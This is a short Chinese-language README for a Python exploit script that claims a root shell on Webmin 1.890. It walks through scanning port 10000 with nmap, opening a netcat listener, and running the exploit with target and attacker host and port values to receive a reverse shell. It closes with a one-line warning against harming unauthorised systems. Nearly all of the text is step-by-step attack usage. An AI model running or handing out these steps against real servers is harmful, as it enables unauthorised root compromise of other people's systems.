此 Python 脚本可在 Webmin 1.890 上获取 root shell。
使用 nmap 检测:
nmap -sC -sV -p 10000 TARGET_IP
结果:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
如何使用此漏洞:
步骤 1:
nc -lnvp LPORT
步骤 2:
chmod +x exploit.py
`./exploit RHOST RPORT LHOST LPORT`
RHOST = 目标主机
RPORT = 目标 IP 地址(通常为 10000)
LHOST = 你的 Kali 机器
LPORT = 你的反弹 Shell 端口
步骤 3: 获取 root shell!
严禁对未授权系统造成损害!!!